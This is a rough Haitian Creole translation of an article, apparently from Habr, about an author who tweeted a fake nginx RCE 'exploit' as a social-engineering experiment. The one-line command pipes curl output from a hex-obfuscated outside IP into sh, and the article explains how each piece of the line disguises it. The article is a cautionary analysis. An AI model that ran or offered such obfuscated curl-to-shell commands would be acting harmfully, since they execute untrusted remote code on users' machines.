Siksè yon eksperyans sosyal ak yon fo esplwate pou nginx

Remak. trad.: Author nòt orijinal, ki te pibliye sou 1ye jen, deside fè yon eksperyans nan mitan moun ki enterese nan sekirite enfòmasyon. Pou fè sa, li te prepare yon fo esplwate pou yon vilnerabilite ki pa divilge nan sèvè entènèt la epi li poste li sou Twitter li. Sipozisyon li yo - yo dwe imedyatman ekspoze pa espesyalis ki ta wè desepsyon nan evidan nan kòd la - non sèlman pa t 'rive vre ... Yo depase tout atant, ak nan direksyon opoze a: tweet la te resevwa gwo sipò nan men anpil moun ki pa t '. tcheke sa ki ladan yo.

TL;DR: Pa sèvi ak dosye pipelining nan sh oswa bash nan okenn sikonstans. Sa a se yon bon fason pou pèdi kontwòl òdinatè w lan.

Mwen vle pataje avèk nou yon ti istwa sou yon eksplwa PoC komik ki te kreye 31 me. Li parèt san pèdi tan an repons a nouvèl ki soti nan Alisa Esage Shevchenko, manm Zewo Inisyativ Jou (ZDI), enfòmasyon sa a sou yon vilnerabilite nan NGINX ki mennen nan RCE (ekzekisyon kòd aleka) pral byento dwe divilge. Depi NGINX pouvwa anpil sit entènèt, nouvèl la dwe te yon bonm. Men, akòz reta nan pwosesis "divilgasyon responsab", detay yo sou sa ki te pase yo pa te konnen - sa a se pwosedi ZDI estanda.

Tweet sou divilgasyon vilnerabilite nan NGINX

Lè m te fini travay sou yon nouvo teknik obfuscation nan boukl, mwen te site tweet orijinal la ak "fuit yon PoC k ap travay" ki fòme ak yon sèl liy kòd ki sipoze eksplwate vilnerabilite dekouvri. Natirèlman, sa a se te yon istwa san sans. Mwen sipoze ke mwen ta dwe imedyatman ekspoze, e ke nan pi bon mwen ta jwenn yon koup la retweets (o byen).

Tweet ak fo esplwate

Sepandan, mwen pa t 'kapab imajine sa ki te pase apre. Popilarite tweet mwen an te monte. Surprenante, nan moman sa a (15:00 Moskou lè 1 jen) kèk moun te reyalize ke sa a se yon fo. Anpil moun retweet li san yo pa tcheke li ditou (se pou kont li admire bèl grafik ASCII li soti).

Jis gade jan li bèl!

Pandan ke tout bouk sa yo ak koulè yo gwo, li klè ke moun te oblije kouri kòd sou machin yo wè yo. Erezman, navigatè yo travay menm jan an, epi konbine avèk lefèt ke mwen pa t reyèlman vle jwenn nan pwoblèm legal, kòd la antere l 'nan sit mwen an te jis fè apèl eko san yo pa eseye enstale oswa egzekite nenpòt lòt kòd.

Ti digresyon: netspooky, dnz, mwen menm ak lòt mesye yo nan ekip la Thugfowd Nou te jwe ak diferan fason yo ofuske kòmandman boukl pou yon ti tan kounye a paske li se fre ... epi nou se geeks. netspooky ak dnz te dekouvri plizyè nouvo metòd ki te sanble trè pwomèt pou mwen. Mwen te antre nan plezi a epi mwen te eseye ajoute konvèsyon desimal IP nan sak la nan ke trik nouvèl. Li sanble ke IP kapab tou konvèti nan fòma egzadesimal. Anplis, curl ak pifò lòt zouti NIX yo san pwoblèm mwen tap manje IP egzadesimal! Se konsa, li te jis yon kesyon de kreye yon liy lòd konvenk ak sekirite-kap. Finalman mwen te deside sou yon sèl sa a:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Jeni sosyo-elektwonik (SEE) - plis pase jis èskrokri

Sekirite ak abitye te yon pati enpòtan nan eksperyans sa a. Mwen panse ke yo se sa ki te mennen nan siksè li. Liy lòd la klèman enplike sekirite lè li refere a "127.0.0.1" (localhost la byen koni). Localhost konsidere kòm an sekirite epi done ki sou li pa janm kite òdinatè w lan.

Abitye se te dezyèm eleman kle SEE nan eksperyans la. Depi odyans lan sib prensipalman fèt nan moun ki abitye ak Basics yo nan sekirite òdinatè, li te enpòtan yo kreye kòd pou ke pati nan li te sanble abitye ak abitye (ak Se poutèt sa an sekirite). Prete eleman nan ansyen eksplwate konsèp ak konbine yo nan yon fason etranj pwouve yo gen anpil siksè.

Anba a se yon analiz detaye sou yon sèl-revètman la. Tout bagay sou lis sa a mete nati kosmetik, ak pratikman pa gen anyen ki nesesè pou operasyon aktyèl li yo.

Ki eleman ki vrèman nesesè? Sa a -gsS, -O 0x0238f06a, |sh ak sèvè entènèt la tèt li. Sèvè entènèt la pa t gen okenn enstriksyon move, men tou senpleman te sèvi grafik ASCII lè l sèvi avèk kòmandman echo nan script ki genyen nan index.html. Lè itilizatè a antre nan yon liy ak |sh nan mitan, index.html chaje ak egzekite. Erezman, gadyen sèvè entènèt la pa te gen okenn move entansyon.

• ../../../%00 — reprezante ale pi lwen pase anyè a;
• ngx_stream_module.so - chemen nan yon modil NGINX o aza;
• /bin/sh%00<'protocol:TCP' - nou swadizan lanse /bin/sh sou machin nan sib ak redireksyon pwodiksyon an nan kanal la TCP;
• -O 0x0238f06a#PLToffset - engredyan sekrè, complétée #PLToffset, gade tankou yon konpanse memwa yon jan kanmenm genyen nan PLT la;
• |sh; - yon lòt fragman enpòtan. Nou te bezwen redireksyon pwodiksyon an nan sh/bash yo nan lòd yo egzekite kòd ki soti nan sèvè entènèt atak la ki sitiye nan 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - yon egare nan ki netcat refere a /dev/tcp/localhostpou tout bagay sanble an sekirite ankò. An reyalite, li pa fè anyen epi li enkli nan liy lan pou bote.

Sa a konkli dekodaj nan script nan yon sèl-liy ak diskisyon an sou aspè nan "jeni sosyo-elektwonik" (èskrokri konplike).

Konfigirasyon sèvè entènèt ak kontre mezi

Piske a vas majorite abonnés mwen yo se infosec/hackers, mwen deside fè sèvè entènèt la yon ti kras pi rezistan a ekspresyon "enterè" sou pati yo, jis pou mesye yo ta gen yon bagay yo fè (e li ta plezi yo mete kanpe). Mwen pa pral lis tout enkonvenyans yo isit la depi eksperyans la toujou ap kontinye, men isit la se kèk bagay sèvè a fè:

• Siveye aktivman tantativ distribisyon sou sèten rezo sosyal epi ranplase divès miniature aperçu pou ankouraje itilizatè a klike sou lyen an.
• Redireksyon Chrome/Mozilla/Safari/etc nan videyo pwomosyon Thugcrowd olye pou yo montre script koki a.
• Gade pou siy evidan nan entrizyon / piratage flagran, ak Lè sa a, kòmanse redireksyon demann nan serveurs NSA (ha!).
• Enstale yon Trojan, osi byen ke yon routki BIOS, sou tout òdinatè ki gen itilizatè yo vizite lame a nan yon navigatè regilye (jis plèzantri!).

Yon ti pati nan antimèr

Nan ka sa a, objektif mwen sèlman se te metrize kèk nan karakteristik yo nan Apache - an patikilye, règ yo fre pou redireksyon demann - e mwen te panse: poukisa pa?

NGINX eksplwatasyon (reyèl!)

Abònman nan @alisaesage sou Twitter epi swiv gwo travay ZDI nan abòde vilnerabilite trè reyèl ak eksplwate opòtinite nan NGINX. Travay yo te toujou kaptive m 'epi mwen rekonesan anvè Alice pou pasyans li ak tout mansyone ak notifikasyon tweet estipid mwen te lakòz. Erezman, li te tou fè kèk byen: li te ede ogmante konsyantizasyon nan vilnerabilite NGINX, osi byen ke pwoblèm ki te koze pa abi nan boukl.

Sous: www.habr.com